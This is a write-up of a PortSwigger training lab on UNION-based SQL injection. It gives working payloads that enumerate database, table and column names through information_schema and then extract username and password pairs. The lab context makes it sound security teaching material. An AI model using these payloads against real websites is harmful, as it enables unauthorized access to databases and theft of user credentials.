SQL injection UNION attack, retrieving data from other tables
https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
Level: Practitioner
In this lab I will be showing how to get columns, tables and databases using a union-based attack.
First, we need to know the number of columns that are in the table that we are using.
You can do this as is in the following image, or you can use order by either.
To get all the databases name, use the following payload.
' Union select schema_name,NULL from information_schema.schemata-- -
In a simple break down in this expression this is what it means:
Information_schema.schemata - list me the DB names.
schema_name - get me back the DB names.
Now that we know the DB name that we want, we need to get the names of the tables.
Use the following payload to retrieve the name of the tables.
' Union select table_name,NULL from information_schema.tables where table_schema = 'DB_NAME' -- -
Breakdown
information_schema.tables - list me all the tables.
table_name - get me back the name of the tables.
table_schema - name of the database we want to use.
Now we use the following payload to get the columns of the table that we want.
' Union select column_name,NULL from information_schema.columns where table_name = 'TABLE_NAME' -- -
Breakdown
column_name - get me the names of the columns.
information_schema.columns - list me all the columns.
table_name - this is to select the table that we want to get info.
Now that we know the columns that we want to extract data, I like to use the following.
' Union select NULL,username||':'||password from users -- -
Breakdown
username||':'||password - this to represent the data in a better way.
*Important*
If you don't understand the SQL logic and the way on how to write one, I recommend to practice in a virtual lab where you make the DB and break it by yourself.
Last updated